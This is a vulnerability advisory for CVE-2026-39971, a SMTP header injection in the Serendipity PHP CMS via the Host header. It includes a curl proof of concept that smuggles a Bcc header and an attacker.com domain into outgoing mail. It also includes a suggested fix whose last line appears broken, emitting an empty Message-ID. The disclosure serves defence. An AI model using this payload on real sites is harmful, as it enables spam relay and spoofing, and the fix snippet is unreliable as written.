CVE-2026-39971

HIGH
2026-04-14 https://github.com/s9y/Serendipity GHSA-458g-q4fh-mj6r
PHP RCE
7.2
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

1
Analysis Generated
Apr 15, 2026 - 01:09 vuln.today

DescriptionNVD

Summary

Serendipity inserts $_SERVER['HTTP_HOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

php
$maildata['headers'][] = 'Message-ID: <'
    . bin2hex(random_bytes(16))
    . '@' . $_SERVER['HTTP_HOST']  // ← unsanitized, attacker-controlled
    . '>';

The existing sanitization function only blocks \r\n and URL-encoded variants:

php
function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers - making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as:

  • New comment notifications to blog owner
  • Comment subscription notifications to subscribers
  • Password reset emails (if configured)

PoC

bash
# Trigger comment notification email with injected header
curl -s -X POST \
  -H "Host: attacker.com>\r\nBcc: [email protected]\r\nX-Injected:" \
  -d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email][email protected]&serendipity[entry_id]=1" \
  http://[TARGET]/comment.php

Resulting malicious Message-ID header in outgoing email:

Message-ID: <[email protected]>
Bcc: [email protected]
X-Injected: >

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). This enables:

  • Identity spoofing - emails appear to originate from attacker-controlled domain
  • Reply hijacking - some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure
  • Email reputation abuse - attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

php
$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '',
    parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)
);
$maildata['headers'][] = 'Message-ID: ';

AnalysisAI

SMTP header injection in Serendipity CMS allows remote unauthenticated attackers to inject arbitrary email headers via malicious Host header during email-triggering operations (comments, subscriptions, password resets). The unsanitized $_SERVER['HTTP_HOST'] value is embedded directly into Message-ID headers without validation, enabling BCC injection, email spoofing, and reply hijacking. …

Sign in for full analysis, threat intelligence, and remediation guidance.

RemediationAI

Within 24 hours: Identify all Serendipity CMS instances in your environment and document versions and external-facing exposure. Within 7 days: Implement input validation/sanitization on $_SERVER['HTTP_HOST'] values and restrict Host header acceptance to known domains via web server configuration (Apache/Nginx allowlist); disable or restrict comment and password-reset features if not critical. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Share

CVE-2026-39971 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy